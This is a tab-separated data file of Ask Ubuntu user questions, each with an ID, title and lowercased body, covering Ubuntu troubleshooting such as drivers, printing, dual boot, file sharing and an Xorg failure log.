425042	pressing tab for autocompleting the directory name in terminal , appens a space after the directory name and not a `` / '' sign	when i use `` cd '' command to move to certain directory in terminal , i press tab button to autocomplete the directory name , and a `` / '' sign appends at the end . but , when i use some other command ( say `` mv '' ) , clicking on tab button to autocomplete the directory name , autocompletes the directory name , but does not append `` / '' after it , but a space . so , i have to manually delete the space by pressing backspace button and type `` / '' . but , in my friend 's laptop , it does not occur . whichever command he uses , he always gets `` / '' after presing tab button to autocomplete the directory name . please tell how to solve this problem . i have freshly installed 12.04 lts version . see the screenshot here : https : //drive.google.com/file/d/0b9dhwm5go59hznfitmlovjzwcgs/edit ? usp=sharing
425045	how to start .sh file on pc turn on or after pc restart ?	i have a .sh file in my downloads directory . i want to start it using tmux session when computer is turn on or after computer is restarted . i am using ubuntu 12.04.4 and when the computer is turned on the user is not logged in automatically - a password is required . also , the guest account is disabled . in my /home/user/.bashrc file i have added the following lines : /etc/init.d/ssh start /etc/init.d/networking start in order when the pc is restarted to be able to instantiate ssh session if the user is not logged in . what i need is to find a way to start the .sh file , too but using tmux session . could anyone point to me the steps of doing such thing ?
425046	problem after last update2	after install last update i can not open my download folder it closed automatically . sys log is 8 sandipan-020283 kernel : [ 705.231744 ] show_signal_msg : 147 callbacks suppressed feb 23 14:31:48 sandipan-020283 kernel : [ 705.231749 ] nautilus [ 2592 ] : segfault at 0 ip b6920e15 sp b34c2e68 error 4 in libpthread-2.17.so [ b6914000+17000 ] and xorg.0.log is [ 2687.264 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 2764.367 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 2768.389 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 2769.641 ] ( ii ) nvidia ( gpu-0 ) : display ( philips 166vl ( crt-0 ) ) does not support nvidia 3d [ 2769.642 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 2769.642 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 2769.642 ] ( ** ) nvidia ( 0 ) : device philips 166vl ( crt-0 ) ( using edid frequencies has [ 2769.642 ] ( ** ) nvidia ( 0 ) : been enabled on all display devices . ) [ 2769.642 ] ( ww ) nvidia ( gpu-0 ) : the edid for philips 166vl ( crt-0 ) contradicts itself : mode [ 2769.642 ] ( ww ) nvidia ( gpu-0 ) : `` 1368x768 '' is specified in the edid ; however , the edid's [ 2769.642 ] ( ww ) nvidia ( gpu-0 ) : reported maximum pixelclock ( 85.5 mhz ) would exclude this [ 2769.642 ] ( ww ) nvidia ( gpu-0 ) : mode 's pixelclock ( 85.9 mhz ) ; ignoring edid maximum [ 2769.642 ] ( ww ) nvidia ( gpu-0 ) : pixelclock check for mode `` 1368x768 '' . [ 2772.994 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 2802.636 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 2915.952 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 3158.372 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 3198.117 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 3200.081 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 3210.806 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm
425049	how to recover the deleted folder in ubuntu 12.04	unfortunately i delete my document folder in ubuntu 12.04 desktop . how to recover the document folder using commands ...
425051	root issues in ubuntu 12.04	i 'm trying to activate my equalizer plug-in on rhythm-box , but it keeps asking me , '' are you root ? '' i tried my own password but to no avail . i 'd appreciate some advice please .
425052	epson xp-215 installed printer is ready but does not print	i have the following problem with my new epson xp-215 . i have downloaded and installed the drivers from the epson website . i 'm using ubuntu 13.10 ( 32bit ) . the printer is displayed correctly and is ready . when i try to print a document it shows up in the queue , but it remains halted . the printer does not print job after continue or restart . in the print queue is also the message : file `` usr / lib / cups / filter / epson-escpr-wrapper '' not available : no such file or directory i do not know how to continue from here and hope that someone with more knowledge than i have has an idea to solve .
425054	how to change/customize boot settings in grub , so that ubuntu fully recognizes the hardware it runs on ?	i 've got a problem with ubuntu 13.10 on my laptop acer aspire 5750zg . it can not recognize that it is running on laptop - there is no battery indicator , power consumption is very high . simply changing `` system settings '' - `` power options '' did n't help . i 've found some related problems , but neither of them worked in my case . edit : i needed to set acpi=off option to boot settings in grub for ubuntu to work correctly - maybe this is the source of my problems ?
425055	no sound using intel hdmi	trying to setup a htpv for family . analog stereo works . connecting the pc via hdmi to a tv brings no sound . in pavucontrol , there is no hdmi even listed . whats the issue here ? mb : asrock b85m pro4 apu : intel core i3-4130 gpu : / sys : fresh kubuntu 13.10 , updated today , no modifications dmesg : http : //pastebin.com/hhnxpmmg
425063	how to install ubuntu 13.10 ?	i have downloaded ubuntu 13.10 desktop . now i ca n't open it to install it . keep getting a request for which program to use to open it . how do i install it ?
425065	screen brightness on acer aspirev : bar appears , brightness does n't change	using 12.04 on an acer aspire v5-561-9410 . when i use the function keys to modify screen brightness ( or use any solutions i 've found here to this problem like the one found here or here ) , i see the brightness bar appear and change in the top right of my screen , but my actual screen brightness does n't change . does anyone know of a fix for this ? i 'm assuming it 's a related issue , but i also do n't see any change in screen brightness when going from running on ac power to running on battery .
425071	recommended laptop model of dell vostro for running ubuntu 12.x	which is the recommended laptop model for dell vostro . is it 2420 or 2520 or 3560 , which is the latest ? i currently have 2420 , 2520 as well and i am having lots of issues with wireless drivers for 2520 . i just need to know which machine is better for software development
425072	install command for java	i am trying to install java on my ubuntu 12.04 , and i followed the official instructions : http : //java.com/en/download/help/linux_x64_install.xml # install i am stuck at # 3 : unpack the tarball and install java . i have succesfully run tar zxvf jre-7u7-linux-x64.tar.gz ( which just unpacks ) , but what is the command for installing it ?
425075	strange ethernet problems	ok so i had a few problems getting drivers for the wireless and wired connections to work for my dell inspiron 6400 but i managed to get them fixed a few days ago.. the problem im now faced with is that when i have the ethernet plugged in , it will disconnect from the internet after a very short period of time but it will say that it is still connected , the only way of resolving it is to reboot which is frustrating ! wireless will be ok so long as i dont use youtube or anything that requires a significant amount of data , if i do , it will disconnect and like the ethernet , ill have to reboot to resolve this issue ive read a few threads about this problem but i couldnt find any that matched as a lot were using different computers that required different drivers so i assumed those answers would be of no use to me ! does anyone else share this problem or know whats going on here ?
425076	failed to fetch from ppa , 404 not found error	i can not install it on my ubuntu these updates every time there is this error , here seen in the screenshot :
425077	remote backup with a file by file encryption ?	i want to do remote backups over internet ( so limited bandwidth ) from an ubuntu server to a imac machine ( posix compliant ) supporting both ssh and rsync . i do have sudo rights on both machines . the imac location is not to be considered safe so the data should be encrypted ( beforehand or on the fly ) . so far duplicity works actually pretty good but i see one big disadvantage here , it makes one big archive ( split into parts ) so i am a bit worried about how it handles data corruption . i would prefer to have a solution in which every file is encrypted separate and can be decrypted separate . anyone any suggestions ?
425079	python urlopen function raises an error when an https site is given as input	please do n't mark the question as a duplicate . i have gone through every possibility , but i did n't find an answer . i use ubuntu 12.04 ( lts ) python urlopen function raises this error message when an https site is given as input : traceback ( most recent call last ) : file `` fb.py '' , line 13 , in < module > htmlfile = urllib.urlopen ( url ) file `` /usr/lib/python2.7/urllib.py '' , line 86 , in urlopen return opener.open ( url ) file `` /usr/lib/python2.7/urllib.py '' , line 207 , in open return getattr ( self , name ) ( url ) file `` /usr/lib/python2.7/urllib.py '' , line 436 , in open_https h.endheaders ( data ) file `` /usr/lib/python2.7/httplib.py '' , line 954 , in endheaders self._send_output ( message_body ) file `` /usr/lib/python2.7/httplib.py '' , line 814 , in _send_output self.send ( msg ) file `` /usr/lib/python2.7/httplib.py '' , line 776 , in send self.connect ( ) file `` /usr/lib/python2.7/httplib.py '' , line 1161 , in connect self.sock = ssl.wrap_socket ( sock , self.key_file , self.cert_file ) file `` /usr/lib/python2.7/ssl.py '' , line 381 , in wrap_socket ciphers=ciphers ) file `` /usr/lib/python2.7/ssl.py '' , line 143 , in __init__ self.do_handshake ( ) file `` /usr/lib/python2.7/ssl.py '' , line 305 , in do_handshake self._sslobj.do_handshake ( ) ioerror : [ errno socket error ] [ errno 8 ] _ssl.c:504 : eof occurred in violation of protocol how do i fix this ?
425083	how to create a file or folder and the same time write it to the .sh file	how to create a file or folder and the same time write it to the .sh file ? for example : word count for a file , write that info to a new file and save it in the .sh file at the same time . i tried : echo 'wc filename.txt > ./folder/newfilename.txt ' > > tothefilename.sh it would give me the word count for file name in the folder , but in the sh file it would give me what 's on the quotes .
425084	why does my screen goes `` fuzzy '' ?	for some reason , my screen will randomly go fuzzy and i will have to restart my laptop . this has happened 3 times since i installed ubuntu 12.04 yesterday . thanks !
425085	did i accept the ttf-mscorefonts-installer eula ?	the general answer to questions about missing video codecs is to install ubuntu-restricted-extras . but that metapackage also includes the ttf-mscorefonts-installer which requires acceptance of a eula to finish . not everyone wants to sign the eula , but there 's no obvious way to reject the eula . see how to reject an eula when installing packages with apt ? i wound up going back and forth a few times before i seemed to move on -- i think clicking fwd , fwd without ever accepting the eula works , but the package is installed now , so the installation of this package was not canceled . does that mean i did accept the eula ? is there somewhere i can look to see whether or not that acceptance was logged or stored ? dpkg-query clearly shows the package as installed : amanda @ mona : ~ $ dpkg-query -l ttf-mscorefonts-installer desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==============-============-============-================================= ii ttf-mscorefont 3.4+nmu1ubun all installer for microsoft truetype
425086	various troubles with ubuntu 12.04 lts ( toshiba satellite )	i installed ubuntu 12.04 lts on my toshiba satellite c660d-1fv a few days ago . although the os is updated , i 'm experiencing some problems like : when 2 or more applications are simultaneously running , they often stop responding some definitons , like the bluetooth or brightness ones , don't automatically save ( that means i have to set them up everytime i turn my pc on ) folders with 1gb or more take more than 20 minutes to copy from an external disk to ubuntu desktop . none of the people i know using ubuntu 12.04 lts experience these issues . is there anyway to help me solve these problems ?
425089	finding out what files are missing on my computer	something weird has happened to my ubuntu and some files are missing . syslog says : syslog now i wan na find out what files are missed or preferably even damaged . i think there must be some way doing so based on database behind updatedb . anybody has any idea about this ?
425092	s.m.a.r.t . test reports defect , can i re-initialise the drive ?	on my server i have a 4 disk raid-5 configuration . one of the drives fails the s.m.a.r.t . test . the array has not yet been declared as degraded but the disk shows up as needing replacement . i do n't want to spent money on a new drive just because it has a couple of bad blocks . so , i 've been thinking , if i remove the drive from the array , reformat it and then re-insert it again . will i be able to re-initialise it and will the bad sectors get mapped out automagically ? or do i need to do something extra ? ( please note : i 'm using a headless , x-less server . so , only cli available . ) also , due to input from others , i already pulled the drive and replaced it by the spare . the array is repairing . so , the disk is sitting on the shelf now with me wondering : if i put it back later , will the bad blocks be mapped out ?
425093	how to install ubuntu 13.10 if hardware does n't support nouveau video driver	i have acer aspire v3-772g laptop with nvidia geforce gt 750m . i had a 13.04 with windows 8 until recently and all works fine . but when i try to install 13.10 from usb it crashes during boot . according to logs the reason is that nouveau driver does n't support my video card and therefore x server ca n't start . so how can i replace nouveau driver in iso image with proprietary nvidia driver ? i tried to download 331.20 nvidia driver ( .run ) , set up nomodeset and when the error occurred , i took these steps : rename downloaded file nvidia.run ( for convenience ) and move it t my home directory install libraries for compiling things : sudo apt-get install build-essential linux-headers-uname -r reset xorg.conf to basic state : sudo dpkg-reconfigure -phigh xserver-xorg turn off display manager : sudo /etc/init.d/mdm stop run nvidia installer : sudo sh nvidia.run ( and the driver 331.20 - really installed ( so i can see libglx.so.331.20 in /usr/lib/xorg/modules/extensions ) ) rename origin libglx.so to libglx.so.orig , and libglx.so.331.20 to libglx.so ( make a link with ln -s ) sudo /etc/init.d/mdm start and i still see the same . error : '' failed to start x server ... . '' and `` ( ee ) screen ( s ) found , but none have a usable configuration ... '' can anybody tell me how to correctly install ubuntu 13.10 on my laptop ? thanks for advance ... p.s . here is my log : [ 27.278 ] x.org x server 1.14.3 release date : 2013-09-12 [ 27.278 ] x protocol version 11 , revision 0 [ 27.278 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 27.278 ] current operating system : linux mint 3.11.0-12-generic # 19-ubuntu smp wed oct 9 16:20:46 utc 2013 x86_64 [ 27.278 ] kernel command line : boot_image=/casper/vmlinuz file=/cdrom/preseed/linuxmint.seed boot=casper iso-scan/filename= quiet splash -- nomodeset [ 27.278 ] build date : 15 october 2013 09:23:37am [ 27.278 ] xorg-server 2:1.14.3-3ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) [ 27.278 ] current version of pixman : 0.30.2 [ 27.278 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 27.278 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 27.278 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : sat feb 22 18:31:05 2014 [ 27.278 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 27.278 ] ( == ) no layout section . using the first screen section . [ 27.278 ] ( == ) no screen section available . using defaults . [ 27.278 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 27.278 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 27.278 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 27.278 ] ( == ) automatically adding devices [ 27.278 ] ( == ) automatically enabling devices [ 27.278 ] ( == ) automatically adding gpu devices [ 27.278 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 27.278 ] entry deleted from font path . [ 27.278 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 27.278 ] entry deleted from font path . [ 27.278 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 27.278 ] entry deleted from font path . [ 27.278 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 27.278 ] entry deleted from font path . [ 27.278 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 27.278 ] entry deleted from font path . [ 27.278 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 27.278 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 27.278 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 27.278 ] ( ii ) loader magic : 0x7f7d55074d20 [ 27.278 ] ( ii ) module abi versions : [ 27.278 ] x.org ansi c emulation : 0.4 [ 27.278 ] x.org video driver : 14.1 [ 27.278 ] x.org xinput driver : 19.1 [ 27.278 ] x.org server extension : 7.0 [ 27.279 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:0416:1025:0781 rev 6 , mem @ 0xd3000000/4194304 , 0xc0000000/268435456 , i/o @ 0x00005000/64 [ 27.279 ] ( -- ) pci : ( 0:1:0:0 ) 10de:0fe4:1025:0781 rev 161 , mem @ 0xd2000000/16777216 , 0xa0000000/268435456 , 0xb0000000/33554432 , i/o @ 0x00004000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 27.279 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 27.279 ] initializing built-in extension generic event extension [ 27.279 ] initializing built-in extension shape [ 27.279 ] initializing built-in extension mit-shm [ 27.279 ] initializing built-in extension xinputextension [ 27.279 ] initializing built-in extension xtest [ 27.279 ] initializing built-in extension big-requests [ 27.279 ] initializing built-in extension sync [ 27.279 ] initializing built-in extension xkeyboard [ 27.279 ] initializing built-in extension xc-misc [ 27.279 ] initializing built-in extension security [ 27.279 ] initializing built-in extension xinerama [ 27.279 ] initializing built-in extension xfixes [ 27.279 ] initializing built-in extension render [ 27.279 ] initializing built-in extension randr [ 27.279 ] initializing built-in extension composite [ 27.279 ] initializing built-in extension damage [ 27.279 ] initializing built-in extension mit-screen-saver [ 27.279 ] initializing built-in extension double-buffer [ 27.279 ] initializing built-in extension record [ 27.279 ] initializing built-in extension dpms [ 27.279 ] initializing built-in extension x-resource [ 27.279 ] initializing built-in extension xvideo [ 27.279 ] initializing built-in extension xvideo-motioncompensation [ 27.279 ] initializing built-in extension selinux [ 27.279 ] initializing built-in extension xfree86-vidmodeextension [ 27.279 ] initializing built-in extension xfree86-dga [ 27.279 ] initializing built-in extension xfree86-dri [ 27.279 ] initializing built-in extension dri2 [ 27.279 ] ( ii ) `` glx '' will be loaded by default . [ 27.279 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 27.279 ] ( ii ) loadmodule : `` dri2 '' [ 27.279 ] ( ii ) module `` dri2 '' already built-in [ 27.279 ] ( ii ) loadmodule : `` glamoregl '' [ 27.279 ] ( ii ) loading /usr/lib/xorg/modules/libglamoregl.so [ 27.280 ] ( ii ) module glamoregl : vendor= '' x.org foundation '' [ 27.280 ] compiled for 1.14.2.901 , module version = 0.5.1 [ 27.280 ] abi class : x.org ansi c emulation , version 0.4 [ 27.280 ] ( ii ) loadmodule : `` glx '' [ 27.280 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 27.280 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 27.280 ] compiled for 1.14.3 , module version = 1.0.0 [ 27.280 ] abi class : x.org server extension , version 7.0 [ 27.280 ] ( == ) aiglx enabled [ 27.280 ] loading extension glx [ 27.280 ] ( == ) matched intel as autoconfigured driver 0 [ 27.280 ] ( == ) matched vesa as autoconfigured driver 1 [ 27.280 ] ( == ) matched modesetting as autoconfigured driver 2 [ 27.280 ] ( == ) matched fbdev as autoconfigured driver 3 [ 27.280 ] ( == ) assigned the driver to the xf86configlayout [ 27.280 ] ( ii ) loadmodule : `` intel '' [ 27.280 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 27.280 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 27.280 ] compiled for 1.14.3 , module version = 2.99.904 [ 27.280 ] module class : x.org video driver [ 27.280 ] abi class : x.org video driver , version 14.1 [ 27.280 ] ( ii ) loadmodule : `` vesa '' [ 27.280 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 27.280 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 27.280 ] compiled for 1.14.1 , module version = 2.3.2 [ 27.280 ] module class : x.org video driver [ 27.280 ] abi class : x.org video driver , version 14.1 [ 27.280 ] ( ii ) loadmodule : `` modesetting '' [ 27.281 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 27.281 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 27.281 ] compiled for 1.14.1 , module version = 0.8.0 [ 27.281 ] module class : x.org video driver [ 27.281 ] abi class : x.org video driver , version 14.1 [ 27.281 ] ( ii ) loadmodule : `` fbdev '' [ 27.281 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 27.281 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 27.281 ] compiled for 1.14.1 , module version = 0.4.3 [ 27.281 ] module class : x.org video driver [ 27.281 ] abi class : x.org video driver , version 14.1 [ 27.281 ] ( ii ) intel : driver for intel ( r ) integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , hd graphics , hd graphics 2000 , hd graphics 3000 , hd graphics 2500 , hd graphics 4000 , hd graphics p4000 , hd graphics 4600 , hd graphics 5000 , hd graphics p4600/p4700 , iris ( tm ) graphics 5100 , hd graphics 4400 , hd graphics 4200 , iris ( tm ) pro graphics 5200 [ 27.281 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 27.281 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 27.281 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 27.281 ] ( ++ ) using vt number 8 [ 27.286 ] ( ww ) falling back to old probe method for modesetting [ 27.286 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 27.286 ] ( ww ) falling back to old probe method for fbdev [ 27.286 ] ( ii ) loading sub module `` fbdevhw '' [ 27.286 ] ( ii ) loadmodule : `` fbdevhw '' [ 27.286 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 27.286 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 27.286 ] compiled for 1.14.3 , module version = 0.0.2 [ 27.286 ] abi class : x.org video driver , version 14.1 [ 27.286 ] ( ii ) loading sub module `` vbe '' [ 27.286 ] ( ii ) loadmodule : `` vbe '' [ 27.286 ] ( ii ) loading /usr/lib/xorg/modules/libvbe.so [ 27.286 ] ( ii ) module vbe : vendor= '' x.org foundation '' [ 27.286 ] compiled for 1.14.3 , module version = 1.1.0 [ 27.286 ] abi class : x.org video driver , version 14.1 [ 27.286 ] ( ii ) loading sub module `` int10 '' [ 27.286 ] ( ii ) loadmodule : `` int10 '' [ 27.287 ] ( ii ) loading /usr/lib/xorg/modules/libint10.so [ 27.287 ] ( ii ) module int10 : vendor= '' x.org foundation '' [ 27.287 ] compiled for 1.14.3 , module version = 1.0.0 [ 27.287 ] abi class : x.org video driver , version 14.1 [ 27.287 ] ( ii ) vesa ( 0 ) : initializing int10 [ 27.287 ] ( ee ) vesa ( 0 ) : v_bios address 0x0 out of range [ 27.287 ] ( ii ) unloadmodule : `` vesa '' [ 27.287 ] ( ii ) unloadsubmodule : `` int10 '' [ 27.287 ] ( ii ) unloading int10 [ 27.287 ] ( ii ) unloadsubmodule : `` vbe '' [ 27.287 ] ( ii ) unloading vbe [ 27.287 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 27.287 ] ( ee ) fatal server error : [ 27.287 ] ( ee ) no screens found ( ee ) [ 27.287 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 27.287 ] ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 27.287 ] ( ee ) [ 27.292 ] ( ee ) server terminated with error ( 1 ) . closing log file .
425094	hdmi not connected , but sound is going through hdmi , and not through speakers	i connected my laptop with tv through hdmi to watch a movie with some friends and all went well . the sound was giong through hdmi , and i had no problems . however , when i turned the computer on today , i noticed there is no sound . i went to sound settings in system settings and found out that ubuntu still sends sound through hdmi . restarting computer does n't help . here 's a screenshot : as you can see , the sound is going through hdmi , and there is no sound from speakers . restarting the computer does n't help . please help ! thank you !
425096	windows 8 crashed after ubuntu 12.04	windows 8 : i had windows 8 on my laptop - lenovo g500 essential , 1tb hard disk . i shrinked c drive and obtained 435gb as unallocated space . bios : i disabled secure boot and enabled uefi . installing ubuntu : i installed ubuntu 12.04 from dvd . it was working fine . i did shutdown ubuntu . when i started again i saw ubuntu , windows etc . i was able to boot ubuntu without any trouble . but when i tried to boot windows i got a `` disk error '' . i pressed enter which took me back to the os menu . i clicked on system setup which took me to bios screen . whenever i change the boot order and give priority to windows or ubuntu in bios , the corresponding os worked . then i wanted to fix this , so i tried to do ubuntu boot repair . i go got prompts like , `` win efi detected . do you want to actiavate ( take backup and rename windows efi files ) . do you want to continue ( yes/no ) '' for which i selected `` yes '' . i got message like boot repair was successful . from my next restart , i only get grub screen . if i type exit , i get boot menu option . when i select ubuntu , it works fine . but if i select windows , i get a `` disk error '' how should i fix this ?
425100	file could not be renamed , folder name conflicts with filename in ubuntu 13.10	as the title says , my fresh , updated ubuntu 13.10 install , presents a conflict with files and folders of the same name , in the same location , as shown below
425106	ubuntu 13.10 dual boot installation with win 7 problems	well , i downloaded ubuntu 13.10 and i want to install it alongside with windows 7 , but when restarted my pc with the dvd in and appears the installation menu , there 's no dual boot installation option . ps : i have installed ( alongside with windows 7 ) ubuntu 11.04 ( natty narwhal ) and it also appears as normal program in windows 7 . i do n't understand why it does n't recognize windows 7 . i 'm a noob .
425108	how to make jdownloader default downloader ?	http : //www.sony.co.in/support/product/sve1513cyn in this link , if i try to download a driver for windows 8 , it does n't open in jdownloader in chromium browser . i used jdownloader with chromium integration , but the right button does n't work for download link.. how can i download it using jdownloader ? i use ubuntu 13.04
425110	intel graphics installer vs stock driver	i am running a haswell ultrabook and just read about the intel graphics installer , and kubuntu 14.04 . i want to know , if there 's an advantage , if i install . if it 's not running for 14.04 , what would be the advantage if i install on 13.10 ? download link thanks .
425111	.desktop file syntax & its integration in mimeinfo.cache	i want to setup a wine application pdf xchange viewer as the default pdf viewer . for this i followed these steps 1 ] installed wine 2 ] to skip installion & certain microsoft .exe libraries i copied .wine from home directory of my other os & pasted in my home folder . username is same so home folder address will be same as well 3 ] ran wine winecfg & it updated some settings 4 ] then to be sure ran wine < path to exe file of pdf viewer > & was successful 5 ] created .desktop file as following in /usr/share/applications [ desktop entry ] name=pdf-viewer mimetype=application/pdf ; exec=wine `` < path to exe > '' % f type=application startupnotify=true icon= < path to icon > categories=office successful at launching application via .desktop file 6 ] edited follwing entry in mimeinfo.cache to get three option in context menu , two were already there application/pdf=evince.desktop ; master-pdf.desktop ; pdf-viewer.desktop ; 7 ] while in nautilus right-clicked a pdf file , icons were there ... launched it with pdf-viewer the application launched not with the pdf file it just opened : ( questions & observations the pdf file launched correctly using evince & master pdf application following are there exec attribue from .desktop files exec=evince % u exec=/home/echo/apps/masterpdfeditor/pdfeditor % f i am confused about these % f & % u arguments but i tried chaing my wine application .desktop file as follows but no success exec=wine `` < path to exe > '' % u then i further investigated the .desktop files in my previous os ( from which i copied .wine folder ) . i opened its pdf viewer .desktop file located in /home/echo/local/share/applications & here it was completely different exec=env wineprefix= '' /home/usama/.wine '' wine start /progidopen pdf-xchangeviewer.1 % f i copied this exec attribute & edited my .desktop file in /usr/share/applications of the newer os & yes it successfully loaded the respective pdf file via context menu . my question is why we have so much different approaches to something similar i mean % f then % u & finally this absurd wine exec attribute ? can anyone explain what are these why % f & % u failed in wine applications ?
425112	ca n't login to gui with my valid password	i have ubuntu server 12.10 and installed ubuntu-desktop to access it via gui and changed the default runlevel to 5 . now i get the gui login screen with my username ( display name ) but when i enter my password the screen just flicks and comes back to login screen ( doesnt give me any error ) . the same user works fine with same credentials in cli . strange thing is when i click on guest , it logs me in straight away and works fine . any solution please . ps : i am new to ubuntu/linux , keeping in mind , please be basic and simple .
425113	failed to download package file . check you internet connection ?	i know this has been posted a lot of times , but i still have not found solution to fix this problem . i changed my download server to main , to usa , and to serbian ( place where i live ) , but still nothing , im using 12.04 lts from wubi .
425120	disable default username prompt on connected for vsftpd	i configured vsftpd on a ubuntu 13.10 with anonymous_enable=no and local_enable=yes , and use my ssh credential to login . the problem is illustrated in this screenshot : as you can see my username is shown as default name . i think this is a security problem ( i know , i do have a strong password for this username , and adding another layer of obscurity does n't hurt . ) is there anyway to disable default username prompt ? thanks .
425123	sharing ubuntu disk to windows over the network	i have got a hp prolient mini sever in which i have added 2 additional 2tb drives setup as a raid 1 to give redundancy with the view to using it as a central repository for storing photos etc . i could not get ubuntu server to install so gave up and installed 12.04 desktop version i installed ubuntu on the 250 gb drive leving the other empty . all installed fine . i then used disk utility to setup the 2tb drives as data , this says mount point /media/data this drive appears in the shortcuts and i can read and write to it . so far all fine , the problem i have is i can not access it from my windows laptop . i have shared the folder but makes no difference . i can see the folder in windows but can not open it . i think the problem is permissions , but i do n't know how to change them as i can not find the drive through shell . how can i share /media/data in a way i can access it from my windows laptop ?
425124	usb devices in virtualbox windows 7 partition	im running ubuntu 13.10 with virtual box running windows 7 . have a shared hard drive set up between the two . i have set up the virtual box the best i could , and have been searching endlessly on iphone forums and windows help to find out why it wont detect my iphone or any other usb , but they give stupid answers like 'check the cord is plugged in ' and 'restart you phone ' or 'go into device manager ' etc im thinking now its because im running a partition . ( i understood a partition runs exactly like another operating system with everything you need and can do . any one encountered this problem and how did you overcome it ? p.s : guest additions and extension pack installed i have installed windows for 3 reasons . to run itunes for my iphone 3g ( cause wine didnt work ) to run a citrix work server that doesnt accept linux to run ableton live ( music creator )
425125	setting permissions for folders on 2nd drive ubuntu 13.10	running ubuntu 13.10 . have a second hard drive and want to share folders on this drive . i can set up sharing which works for folders on the main drive , and windows and mac computers can see the folders on the 2nd drive , but sharers do n't have permission to access those folders let alone read and write . i 've changed the ownership of the media folder to me , but i ca n't change the ownership of the drive or the permissions of the drive or the folders on the drive . i also set up all three of the folders i want to share in samba with permissions of 777 . still no dice . also , i am not able to see or launch the samba configuration program even though it 's installed . when i try to install it , ubuntu tells me it 's installed and current . help ?
425126	migrate whole mysql to another server	i 'm switching from a vps to another one and i need to migrate my mysql server . is there an easy way to backup/restore all databases and users ( with permissions ) at once ? many thanks
